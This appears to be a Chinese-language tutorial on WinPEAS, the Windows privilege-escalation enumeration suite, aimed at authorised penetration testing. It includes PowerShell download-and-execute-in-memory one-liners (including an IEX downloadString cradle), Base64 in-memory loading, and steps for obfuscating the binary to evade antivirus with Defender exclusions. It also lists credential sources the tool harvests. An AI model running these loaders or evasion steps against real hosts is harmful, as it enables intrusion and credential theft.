网络安全渗透测试应用安全安全与开源治理【免费下载链接】PEASS-ngPEASS - Privilege Escalation Awesome Scripts SUITE (with colors)项目地址https://gitcode.com/gh_mirrors/pe/PEASS-ng点击查看免费下载WinPEASWindows Privilege Escalation Awesome Scripts是 PEASS-ng 项目中针对Windows 主机本地提权路径枚举的脚本套件与 Linux 侧的 linPEAS 同属一个生态。本指南以 winPEAS/README.md 为主线完整覆盖三种发行形态C# .exe、PowerShell .ps1、CMD .bat的快速上手、命令行参数、颜色输出语义、内置检查清单并结合仓库源码与测试用例讲解底层实现帮助你在一台授权测试的 Windows 主机上快速完成系统信息、用户权限、服务漏洞、凭据文件等维度的自动化排查。WinPEAS 是什么三个 Flavours 的定位与选型主仓库 winPEAS/README.md 明确将 WinPEAS 分为三个项目形态仓库路径运行前提适用场景C# .exewinPEAS/winPEASexe.NET Framework 4.5.2功能最全、支持彩色输出、可内存加载、可混淆免杀PowerShell .ps1winPEAS/winPEASps1PowerShell官方实测 5、73、4 未测试2 及以下不完全兼容无 .NET 编译环境、偏好纯脚本形态时CMD .batwinPEAS/winPEASbat任意能跑 cmd.exe 的 Windows无需 .NET 4目标机器无法运行 exe 时的兜底方案但不支持颜色输出三种形态执行的是同一套枚举哲学——找出当前用户可利用的提权路径。exe 版本是维护重点其 Checks.cs 中注册了 16 个检查模块systeminfo、eventsinfo、userinfo、processinfo、servicesinfo、soapclientinfo、applicationsinfo、networkinfo、networkscan、activedirectoryinfo、cloudinfo、windowscreds、registryinfo、browserinfo、filesinfo、fileanalysis下文会逐一说明这些模块的枚举内容。快速开始获取与运行 WinPEAS.exe获取二进制官方建议从项目 releases 页面获取最新预编译版本含混淆与未混淆两种或按照 winPEASexe 编译说明 自行编译。运行要求 .NET 4.5.2。五种典型执行姿势winPEASexe 文档 给出了五种值得掌握的加载方式覆盖落地执行与内存执行两种对抗场景1. 一行命令下载并直接在内存中执行不落地磁盘# 将 $url 替换为 releases 页面中 winPEASany_ofs.exe 的下载地址 $url https://release 直链/winPEASany_ofs.exe $wp [System.Reflection.Assembly]::Load([byte[]](Invoke-WebRequest $url -UseBasicParsing | Select-Object -ExpandProperty Content)) [winPEAS.Program]::Main()2. 拆成两行方便传入参数把需要传递给 WinPEAS 的参数写在Main()的引号内例如[winPEAS.Program]::Main(systeminfo userinfo)。3. 落地到磁盘再执行输出最完整但文件痕迹明显$wc New-Object System.Net.WebClient $wc.DownloadFile(https://release 直链/winPEASany_ofs.exe, winPEASany_ofs.exe) .\winPEASany_ofs.exe4. 从磁盘加载到内存执行$wp [System.Reflection.Assembly]::Load([byte[]]([IO.File]::ReadAllBytes(D:\Users\victim\winPEAS.exe))) [winPEAS.Program]::Main()5. Base64 中转加载适合把二进制编码后粘贴到目标机剪贴板# 本机生成 Base64 [Convert]::ToBase64String([IO.File]::ReadAllBytes(D:\Users\user\winPEAS.exe)) | Out-File -Encoding ASCII D:\Users\user\winPEAS.txt # 目标机从文件读入 $thecontent Get-Content -Path D:\Users\victim\winPEAS.txt # 或直接粘贴剪贴板中的 Base64 字符串 $thecontent aaaaaaaa... # 此处为 winPEAS 的 Base64 内容 # 解码并内存执行 $wp [System.Reflection.Assembly]::Load([Convert]::FromBase64String($thecontent)) [winPEAS.Program]::Main()执行混淆版的注意点混淆版的入口类型名可能与winPEAS.Program不同。先用$wp.EntryPoint拿到实际的ReflectedType再用它调用Main$wp [System.Reflection.Assembly]::Load([byte[]]([IO.File]::ReadAllBytes(D:\Users\victim\winPEAS-Obfuscated.exe))) $wp.EntryPoint # 查看 ReflectedType 名称 [上一步得到的 ReflectedType]::Main()从源码看[winPEAS.Program]::Main()对应 Program.cs 中的静态入口它只是把参数原样转交给Checks.Checks.Run(args)因此所有加载姿势都只是把程序集载入当前 PowerShell 进程并调用 Main参数传递规则完全一致。命令行参数详解winPEASexe 文档 给出的核心参数如下参数作用winpeas.exe -h显示帮助winpeas.exe运行全部检查默认跳过两个慢速附加检查LOLBAS 与 WSL 中的 linpeas.sh输出较吵适合 CTFwinpeas.exe systeminfo userinfo只执行指定检查模块多个用空格分隔winpeas.exe notcolor关闭 ANSI 彩色输出winpeas.exe domain额外枚举域信息默认只枚举本地用户winpeas.exe wait每个测试之间等待用户按键winpeas.exe debug输出额外调试信息winpeas.exe log把输出写入 out.txt 而非标准输出winpeas.exe -vulnpackages将已安装软件包名称/版本提交给 HackTricks 在线查询标记存在漏洞的软件包winpeas.exe -linpeashttp://127.0.0.1/linpeas.sh额外在默认 WSL 发行版中运行 linpeas.sh不提供 URL 时使用 linPEAS 官方发布地址winpeas.exe -lolbas额外执行 LOLBAS 搜索检查参数解析的源码级实现在 Checks.cs 中可以看到这些参数的实际处理逻辑几个值得注意的细节-h等价形式--help、help、/h、-h都会被识别并调用Beaprint.PrintUsage()后退出Checks.cs L122-L129。log支持指定文件名logreport.txt会把输出重定向到自定义文件默认文件名为out.txt常量DefaultLogFile见 Checks.cs L62。-network/-ports内网扫描虽然 README 参数表未展开但源码支持-networkauto自动发现接口/主机、-network10.10.10.10,10.10.10.20扫描指定 IP 列表、-network10.10.10.10/24按网段扫描并可配合-ports80,443,8080指定端口Checks.cs L266-L310。mitre过滤可按 MITRE ATTCK 技术 ID 过滤检查项例如mitreT1552,T1055支持子技术匹配过滤T1552会匹配T1552.001未标注 MITRE 元数据的检查项默认放行Checks.cs L438-L451。fileanalysis默认不执行文件内容级敏感信息搜索耗时较长只有显式指定fileanalysis或all参数才会运行否则启动时会给出黄色提示Checks.cs L320-L323。searchpf/searchall/cmd等参数帮助信息中还有searchpf额外搜索 Program Files、searchall搜索完整凭据文件名列表可能增加数分钟耗时、cmd通过 CMD 获取 WiFi、凭据管理器、剪贴板信息等选项。参数解析是大小写不敏感的全部使用StringComparison.CurrentCultureIgnoreCase且模块名支持部分匹配即可触发对应检查。仓库中的 ArgumentParsingTests.cs 与 ChecksArgumentEdgeCasesTests.cs 专门覆盖了这些参数组合与边界情况如-network与-ports的先后依赖、非法 IP 的拒绝处理可作为了解参数语义的补充参考。输出颜色语义红色是线索绿色是防御WinPEAS 的 exe 版本默认使用 ANSI 颜色输出。colors.png 给出了官方图例红色从攻击者视角看存在特殊权限或配置错误即值得深挖的提权线索绿色存在某种防护或配置正确防御者视角的安全青色活跃用户蓝色禁用用户浅黄色链接。为什么我的输出没有颜色如果直接在 Windows 控制台运行且看不到颜色需要先开启控制台的 ANSI 虚拟终端支持设置后重新打开 CMD生效REG ADD HKCU\Console /v VirtualTerminalLevel /t REG_DWORD /d 1这一逻辑在源码中有对应检查CheckRegANSI()会读取HKCU\Console\VirtualTerminalLevel未设置时提示执行上述注册表命令Checks.cs L632-L643。同时源码还检查了HKLM\...\FileSystem\LongPathsEnabled若长路径未启用默认 260 字符上限会提示可能造成文件搜索漏报Checks.cs L645-L661。完整帮助信息见 help.png默认情况下除 CMD 相关检查外所有检查项都会执行quiet参数可隐藏 banner。内置检查清单16 个模块逐项说明winPEASexe README 给出了完整的检查矩阵以下按模块整理这是 exe 版本的核心能力面ps1/bat 版本是它的子集系统信息systeminfo基础系统信息内嵌版本定义标记当前 Windows 版本已知可利用漏洞版本匹配方式枚举 Microsoft 更新补丁PS / Audit / WEF / LAPS 设置LSA 保护CLFS 日志文件认证缓解状态对应仓库 ClfsAuthentication.cs 与测试 ClfsAuthenticationTests.csCredential Guard硬件与 DMA 安全内核 DMA 保护、Device Guard DMA/IOMMU、UEFI/Secure Boot、VBS、BitLocker 保护器、外部 DMA 接口WDigest缓存凭据数量环境变量Internet 设置驱动器信息杀软Windows DefenderUAC 配置NTLM 设置本地组策略AppLocker 配置及绕过建议打印机命名管道及其 ACL 滥用候选AMSI ProvidersSysMon.NET 版本。用户信息userinfo用户信息当前令牌特权剪贴板文本当前登录用户RDP 会话历史登录用户自动登录凭据主目录密码策略本地用户详情登录会话Logon Sessions。进程信息processinfo非 Microsoft 的有趣进程。服务信息servicesinfo非 Microsoft 的有趣服务可修改的服务可写的服务注册表 binpath可写的、由 LocalSystem 服务加载的 DLL可写的 LocalSystem 服务恢复命令目标PATH DLL 劫持。应用信息applicationsinfo当前活动窗口已安装软件可选的在线已安装包漏洞查询-vulnpackages或all对接 HackTricksAutoRuns计划任务Microsoft Recall PolicyConfiguration 任务暴露CVE-2025-60710 / CVE-2026-20941启用的 SYSTEM 计划任务中的可写执行目标设备驱动。相关测试包括 PrivilegedScheduledTaskTests.cs、PrivilegedWmiEventConsumerTests.cs、WritableServiceDllTests.cs、WritableServiceRecoveryCommandTests.cs。网络信息networkinfo当前网络共享映射驱动器WMIhosts 文件网络接口监听端口防火墙规则DNS 缓存上限 70 条WinINet / WinHTTP / 策略 / 环境 HTTP 代理设置含 ZDI-26-708 暴露指标互联网连通性探测可选的外部主机名解析检查。另可通过-network/-ports触发独立的网络扫描模块networkscan。云元数据枚举cloudinfoAWS Metadata、GCP Metadata、Azure Metadata 探测对应 CloudInfo 下的 AWSInfo / GCPInfo / AzureInfo 实现。Windows 凭据windowscredsWindows Vault凭据管理器保存的 RDP 设置被动式 sethc.exe/Utilman.exe 完整性检查与 RDP/NLA 暴露上下文最近运行命令默认 PS 转录文件DPAPI 主密钥DPAPI 凭据文件Remote Desktop Connection Manager 凭据Kerberos TicketsWiFiAppCmd.exeSSClient.exeSCCM缓存的 SCCM Network Access Account 凭据策略对应测试 SccmNetworkAccessAccountTests.cs安全包凭据AlwaysInstallElevatedWSUSHTTP 降级 CVE-2025-59287 暴露。另含 LAPS 密码暴露检测LapsPasswordExposure.cs 与 LapsPasswordExposureTests.cs。浏览器信息browserinfoFirefox 数据库与历史中的凭据Chrome 数据库与历史中的凭据当前 IE 标签页IE 历史凭据IE 收藏夹为 Firefox、Chrome、Opera、Brave 提取已保存密码实现在 KnownFileCreds/Browsers 目录下。有趣的文件与注册表filesinfo / registryinfoPutty 会话与 SSH 主机密钥SuperPutty 信息OneDrive 同步的 Office365 端点注册表中的 SSH 密钥云凭据unattended 文件SAM 与 SYSTEM 备份暴露的 SAM/SECURITY/SYSTEM 配置单元活动 ACL、备份、卷影副本缓存的 GPP 密码McAfee SiteList.xml 凭据可能存有凭据的注册表项用户主目录中的凭据文件回收站中的密码文件包含凭据的文件耗时数分钟用户文档上限 100Oracle SQL Developer 配置文件Slack 文件搜索Outlook 下载机器/用户证书文件Office 最近文档隐藏文件与文件夹非默认目录中可写的可执行文件WSL 检查。事件信息eventsinfo登录 显式登录事件进程创建事件PowerShell 事件开关机事件。附加慢速检查LOLBAS 搜索-lolbas在默认 WSL 发行版中运行 linpeas.sh-linpeas。注意文件内容级敏感信息搜索fileanalysis默认关闭且搜索耗时与主目录文件数量成正比。默认只搜索部分已知可含凭据的文件名searchall会搜索完整列表可能增加数分钟耗时。WinPEAS.ps1PowerShell 版的使用与 AD 增强ps1 版入口是 winPEAS.ps1约 2000 行其维护者为官方指定的 RandolphConley。快速使用一行命令powershell IEX(New-Object Net.WebClient).downloadString(https://winPEAS.ps1 原始地址)从脚本头部注释winPEAS.ps1 L1-L36可以看到它支持的参数.\winPeas.ps1 # 默认模式驱动盘/注册表中的用户名密码审计 .\winPeas.ps1 -Excel # 搜索中额外包含 Excel 文件.xls/.xlsx/.xlsm .\winPeas.ps1 -FullCheck # 完整审计API / Keys / Tokens会产生误报 .\winPeas.ps1 -TimeStamp # 为每条命令输出加时间戳其 README 中记录了较新的 Active Directory 感知增强标记仅 Kerberos 环境NTLM 受限与票据攻击前的时钟偏差问题审查 AD 集成的 DNS ACL标记低权限用户可注册/修改记录的区域动态 DNS 劫持风险枚举高价值 SPN 账户与弱 gMSA 密码读取者便于定位 Kerberoast 目标暴露 Schannel 证书映射设置在启用 UPN 映射时预警 ESC10 风格证书滥用机会。WinPEAS.bat无 .NET 环境的兜底方案与 icacls 输出解读bat 版定位非常明确——给不支持 WinPEAS.exe无 .NET 4的 Windows 使用但它不支持颜色需要自行理解每个测试的输出。winPEAS.bat 开头用SET longfalse控制是否深度搜索可能含密码的文件与注册表改为true会显著增加耗时。主要检查项系统信息systeminfo 补丁列表可配合 Windows Exploit Suggester 思路常见已知漏洞2K、XP、2K3、2K8、Vista、7 版本匹配Audit / WEF / LAPS / LSA 保护 / Credential Guard / WDigest / 缓存凭据数 / UAC / AV / PS 设置 / 挂载磁盘 / SCCM / RDP 凭据管理器 / WSUS进程列表、正在执行二进制与启动项的文件权限、AlwaysInstallElevated用户信息、当前用户特权、服务二进制权限、可修改服务注册表、未加引号服务路径、PATH DLL 劫持Windows Vault、DPAPI 主密钥、AppCmd.exe、unattended 文件、SAM/SYSTEM 备份、GPP 密码、McAfee SiteList.xml、云凭据、已知含密码的注册表项与文件long模式下全量搜索。辅助枚举还包括日期时间、环境变量、已装软件、运行进程、共享、网络接口、端口、防火墙、ARP、路由、hosts、DNS 缓存、当前用户 PRIVILEGES、组信息管理员、当前登录用户。如何读懂 icacls 权限输出bat 版主要靠icacls配合wmicXP 下则强烈建议上传 Sysinternals accesschk.exe因为 XP 上 icacls 需要管理员权限检查文件权限。icacls 输出并不直观先记住权限缩写winPEASbat README 原文D - Delete access删除 F - Full access完全控制 改权限创建删除读写 N - No access无访问 M - Modify access修改 创建删除读写 RX - Read and eXecute access读执行 R - Read-only access只读 W - Write-only access只写重点盯F完全控制、M修改、W写。WinPEAS.bat 检查文件/文件夹权限时会搜索(F)、(M)、(W)以及:\确保被检查文件的路径出现在输出中并进一步判断该权限能否被当前用户利用。一个无利可图的典型输出权限属于系统组件而非你C:\Windows\Explorer.EXE NT SERVICE\TrustedInstaller:(F)一个有戏的输出你的用户对目标文件有完全控制C:\Users\john\Desktop\desktop.ini NT AUTHORITY\SYSTEM:(I)(F) MYDOMAIN\john:(I)(F)第一行虽然列着NT AUTHORITY\SYSTEM的权限但下一行MYDOMAIN\john:(I)(F)才是关键——说明当前用户 john 对该文件拥有完全控制权这类输出正是需要逐条筛查的对象。进阶用 Dotfuscator 编译混淆版为了绕过部分杀软winPEASexe 文档 提供了官方混淆流程这也是 releases 中winPEASany_ofs.exe的来源在 VisualStudio 中通过搜索CTRLQ输入 dotfuscator 安装该扩展并按提示注册账号激活先编译一份原始 winPEAS.exe打开 Dotfuscator 应用载入编译好的 winPEAS.exe点击Build生成的单文件、最小化且混淆后的二进制会出现在 winPEAS.exe 所在目录的Dotfuscator子文件夹中该路径会被 Dotfuscator 记住后续构建默认输出到这里。仓库内 Dotfuscator/ 目录保存了 DotfuscatorCE.zip可用于复现混淆构建。注意Windows Defender 大概率会直接删除未混淆的初始版本建议提前把源码目录与混淆产物目录加入 Defender 排除项。使用边界与合规声明winPEAS 主 README 末尾的 Advisory 必须强调PEAS 套件的所有脚本/二进制只能用于授权的渗透测试或教育目的任何滥用行为与作者及协作者无关请在自有网络或获得网络所有者许可的前提下使用。此外exe 版本基于 GhostPack/Seatbelt 发展而来全量检查通常只需几秒但搜索已知可含密码文件名的末尾阶段视主目录文件数量可能需要数分钟ps1 版与 bat 版的能力是 exe 版的子集三者的检查原理与利用手法均以 HackTricks 的 Windows 本地提权清单为理论依据对应书籍章节在官方 README 中有链接本文不展开外部地址。把三种形态配合使用exe 主扫 ps1 做 AD 专项 bat 兜底老系统配合本文的参数与颜色解读即可在一台 Windows 主机上完成系统化、可复现的本地提权路径枚举。赞分享网络安全渗透测试应用安全安全与开源治理【免费下载链接】PEASS-ngPEASS - Privilege Escalation Awesome Scripts SUITE (with colors)项目地址https://gitcode.com/gh_mirrors/pe/PEASS-ng点击查看免费下载相关推荐PostGraphile 5 枚举Enums完全指南PostgreSQL 原生枚举、枚举表与 extendSchema 三种实现方案PostGraphile 5 枚举Enums完全指南PostgreSQL 原生枚举、枚举表与 extendSchema 三种实现方案 导读 在 PostG后端API网关PostGraphile 枚举Enum完整指南PostgreSQL 枚举、Enum 表与 extendSchema 的三种实践方案PostGraphile 枚举Enum完整指南PostgreSQL 枚举、Enum 表与 extendSchema 的三种实践方案 导读 本指南聚焦 Po后端API网关Metasploit 后渗透自动化PEASS-ng peass 模块一键执行 LinPEAS 与 WinPEAS 提权枚举Metasploit 后渗透自动化PEASS ng peass 模块一键执行 LinPEAS 与 WinPEAS 提权枚举 导读 在拿到 Meterprete网络安全渗透测试应用安全安全与开源治理上一篇终极Mac文件预览革命如何用QuickLook插件提升10倍工作效率下一篇Steam库存管理终极指南5分钟掌握智能批量操作创作声明:本文部分内容由AI辅助生成(AIGC),仅供参考
阅读完成 · 觉得有帮助?